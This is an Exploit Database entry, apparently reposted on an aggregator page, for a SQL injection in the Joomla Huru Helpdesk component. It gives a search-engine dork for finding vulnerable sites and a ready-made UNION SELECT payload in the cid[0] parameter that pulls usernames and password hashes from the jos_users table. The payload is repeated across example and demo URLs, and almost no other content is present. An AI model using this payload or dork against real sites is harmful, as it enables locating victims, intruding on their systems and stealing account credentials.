Joomla! Component Huru Helpdesk – SQL Injection (2)

• Exploit Database
• 7 阅读

• 作者： Amine_92
  日期： 2010-07-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14449/

• ====================================================
  Joomla Component com_huruhelpdesk SQL Injection Vulnerability
  ===================================================
  
  Author : Amine_92
  Email: [amine92_16@hotmail.fr]
  Homepage : { www.vbhacker.net/vb }
  DORK:inurl:"index.php?option=com_huruhelpdesk"
  ===================================================
  
  [+] Vulnerable File :
  http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
  
  [+] ExploiT :
  -1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
  
  [+] Example :
  http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
  [+] Demo :
  http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
  
  ====================================================
  Thank's to :awras,italiano_capilo & all my friends